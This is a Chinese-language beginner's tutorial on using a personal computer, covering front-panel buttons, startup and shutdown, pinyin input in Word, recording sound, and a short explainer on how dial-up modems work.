跟家里的VCD一样,电脑连线的接口都设在机箱的后面,连好后就很少动它。而控制按钮则全部集中在机箱的前部面板,它们都有些什么用途呢?
1.光驱:学名CD-ROM,读取光盘上数据的设备。我们常说某个光驱是多少倍速的光驱,指它的读取数据是单倍速光驱(150kB/s)的多少倍。比如40速光驱,它的读取速度等于6M/s。除了电脑光盘外,光驱还可以读VCD和CD碟。顺便说句,即便电脑里没装声卡,将一张CD放进去,也可以听音乐。
2.软驱:有时要从朋友那里拷个小程序,那就要用到软盘了,没有软驱可不行。现在见到的一般都是3.5英寸软驱了(3.5英寸指的是软盘里磁片的直径长度)。注意,软盘插入软驱时有方向性,插不进去可不能硬插,这样会把软驱弄坏的。在电脑启动时,如果软驱中还插有软盘,启动会停止下来,在屏幕上出现提示“Invalid system Disk…”,这时只要取出软盘,再随便按任一键就可以继续启动了。
3.电源开关:这还用说吗?不就跟电视机开关一样吗?不过现在的电源开关做得奇形怪状,认准了,旁边有“Power”几个英文字的才是。
4.复位开关:要是遇上机器没了反应,键盘嘟嘟响,鼠标移不动,行话叫“死机”。这时只有拿出最后一招,按下复位开关(旁边有“Reset”字样),就可重新启动电脑,再次进入系统。
5.指示灯:指示电脑的运行状态。当电脑从软盘或硬盘读取数据时,软驱指示灯和硬盘指示灯会分别闪烁。记住,当软驱指示灯还在闪烁的时候,不要忙着取软盘出来,否则很容易伤害软盘。
开机和关机
说了那么多,最后让我们动动手吧,试试打开电脑和关闭电脑。
开机:
1.按下显示器开关,显示器亮了起来。
2.按下机箱前部面板上的电源开关,电脑开始启动。电源指示灯亮,硬盘指示灯闪烁,机箱里有轻微的响动,这是读硬盘的声音。
3.屏幕上显示启动画面,经过一段时间的等待,屏幕定格在的画面。开机启动的过程也告结束。
关机:
1.用鼠标按下图3上的“开始”按钮,再选择“关闭系统”。
2.这时在屏幕中央会出现一个小窗口,选择“关闭计算机”。如果你的计算机比较新,计算机主机会直接关闭。再关上显示器即可。如果你的计算机买得比较久了,可能会在屏幕上现出几个大字“现在可以安全地关闭计算机了”,这时按下机箱上的电源开关,再关上显示器。保险起见的话,最好把插座也拔了。
尽管现在已经有了一些很先进的文字输入方式,比如语音输入、手写输入,但最普遍的输入方式仍然是使用键盘。
小愚:“怎么上面的字母排得那么乱呀?”
确实,初看到键盘的时候,肯定想不明白,字母为什么不按照A、B、C、D……这样排下来呢?其实这是因为键盘的布局沿用了以前打字机的键盘布局。每个字母在一篇文章中出现的频率是不一样的,据说这种布局可以缩短打字时手在键盘上的平均移动距离,提高打字的速度。
注意“F”和“J”这两个键,与其他键有什么不同呢?它们的键帽上面都有一道小突起,这是因为要提高打字速度,就必须盲打,就是说打字时不看键盘直接输入,这要求手指能够在键盘上定位,所以在这两个键上设了个小突起。打字时,食指应该放在……
小愚:“停住,停住,那多麻烦呀,明天我就要向老师交差了,我还是就在键盘上找吧。”
二、 汉字输入法
现在的汉字输入法也有不少,但大体可以分成两大类,音码输入和形码输入。形码输入就是把汉字拆开,用不同的键来代表不同的偏旁部首,比如使用广泛的五笔字形。缺点是要先背诵偏旁在键盘上的位置。音码输入就简单多了,只要你会拼音,就能够使用。但是对于普通话不太好的南方人来说,输入就有点慢了。
用鼠标点击屏幕右下角的输入法图标,如图2,在弹出的的菜单中选择“智能ABC输入法”,然后在屏幕上就会弹出一个小小的工具条,如图3,就可以输入汉字了。在进行汉字处理的时候,最好设为“中文标点符号”。
三、 用Word进行文字处理
点击“开始/程序/Microsoft Word”,启动Word程序,界面如图5所示。调出智能ABC输入法,就可以开始输入文字了。比如要输入“语”字,键入“yu”,再敲空格键,表示结束输入,屏幕上出现可供选择的文字列表,再按空格键,会输入列表为第一个字,也可按数字键输入相应的文字。有时,欲输入的文字并没有出现在列表上,可用“+”、“-”键前后翻页寻找。
输入时有些窍门如下:
1.中英文输入:可以按下“Ctrl+空格键”来切换中英文输入法。还有,也许你会纳闷,拼音中的“ǖ”应该怎样输入呢?用字母“v”代替就可以了。
2.词组输入:连续输入词组的拼音,再按下空格即可。更简便的方法是直接输入词组的拼音开头字母,比如“语文”,可直接输入“yw”。
3.输入罗马数字:用鼠标右击输入工具条上的软键盘图标,弹出如图6菜单,选择其中的“希腊字母”,在屏幕上会弹出一个“小键盘”,单击要输入的数字即可。
4.下划线:先输入几个空格,再按下鼠标左键并拖动鼠标,选中的区域变为黑色,再单击工具栏上的“下划线”按钮。
一阵鼓捣后,小愚终于完成了这份资料的输入,最后单击“文件”菜单上的“保存”,就大功告成了。
录下自己的声音
点击“开始/程序/附件/娱乐/录音机”,调出“录音机”程序。
按下“录音”按钮,开始对着麦克风唱:“……”真有意思,连声音波形都显示出来了。
按“停止”按钮结束录音。
是什么效果呢?按“播放”按钮就知道了。
再试试“效果/加速”选择,咦,小愚的歌声加快了。减速和反向的效果呢,自己试试吧。 “嗯,我得把我的歌保存下来,以后不就可以出专辑了吗,怎么保存呢?”
选择“文件/保存”,出现图4的窗口,输入文件名后再选择“保存”就行了。
麦克风连在哪里
把机箱反过来,让它的背面朝向自己,找找如图的接口,像这样形状的接口只有一个,很好找的。怎么这么多个小圆孔,该插在何处呢?仔细观察,哪个小圆孔旁边有“Mic”字样或话筒图标,有的就是了,插错了也不要紧,换个位置再试,总有一个是的。
改变进入的声音
单击“开始/设置/控制面板”(图5),在出现的窗口里找到“声音”图标。
双击“声音”图标,出现图6窗口。在“启动Windows”上单击。再点击“浏览”按钮。还没忘吧,小愚的第一首歌就放在这个目录下面,把它选中。最后单击“确定”。
现在进入Windows时发出的声音了.
〖猫(ADSL拨号器)]〗的〖基本生理分析〗
"猫",学名调制解调器,英文则称MODEM,现已成为网虫的命根子,被虫虫宏得简直没话说。虫虫每日看着猫眨着眼睛,在它的温柔的叫声中被带入虚拟网络社区里往来穿梭。有的虫虫可能对猫的基本生理习性还不太了解,小弟不才,愿意在这里倾我所知,介绍一下。
世界上第一只"猫"出生于20世纪50~60年代,是AT&T公司设计的,英文代号BELL103。当时由于计算机使用的普及,远程连接计算机和终端便成了迫切的需要。但是专门铺设连接电缆是不可行的,只有借用已有的非常普及的基础设施--普通的电话网。但是电话线上传输的是语音模拟信号,而计算机只能处理数字脉冲信号,"猫"就起了将数字脉冲信号和模拟信号互换的作用。调制(Modulate)是将二进制电信号转化为在公共电话线上传送的音频信号,解调(Demodulate)就是将由公用电话线收到的音频信号转换为二进制电信号给计算机处理。"猫"的英文名MODEM=MO+DEM就是这样得来的。
"外猫"主要由四部分构成:电源、用户接口、DSP(数字信号处理)芯片和调制解调芯片。
DSP芯片是"猫"的心脏,它控制"猫"的其他部位,并按照CCITT(Consultative Committee in International Telegraph and telephone国际电报电话咨询委员会,负责制定数据通信的标准)的规定完成数据的压缩和错误检测。DSP芯片的控制程序固化在两块ROM芯片中,另外备有64K RAM芯片用作临时存储。
调制解调器芯片完成复杂的双向交换,实现前面说的调制、调解基本功能。
"猫"的模拟信号处理部分由用户接口进行,负责与电话网连接。这部分有过载电路系统保护"猫"不受雷电及其它电子干扰的操作。RS-232接口将"猫"和主机或终端连接起来。智能"猫"还可通过RS-232C接口接收命令,自动存储或拨通电话号码。
"猫"持续工作需要稳定的电源,机载的电源可将变压器提供的交流电转换为稳定的直流电。
当今的"猫"品种多样,分为内置、外置、PCMCIA卡式、机架式四种。外置式通过RS-232C电缆与主机相连,有的有液晶数码显示,便于监控,有些还可以有同步、专线、X.25、网管等功能,比较专业。内置式则寄生在PC机扩展槽中,不占用COM口。PCMCIA式是较新颖的一种"猫",主要用在便携式PC中。机架式将许多只"猫"养在一个机架中,具有网络管理,远程监控等功能,用在网络接入、通信枢纽等方面。
当今的"猫"正在不断的发展壮大之中。以后的"猫"将在安全性、数据压缩、差错控制、网络管理功能方面越来越强.
© 2000 - 2025 Rising Corp. Ltd.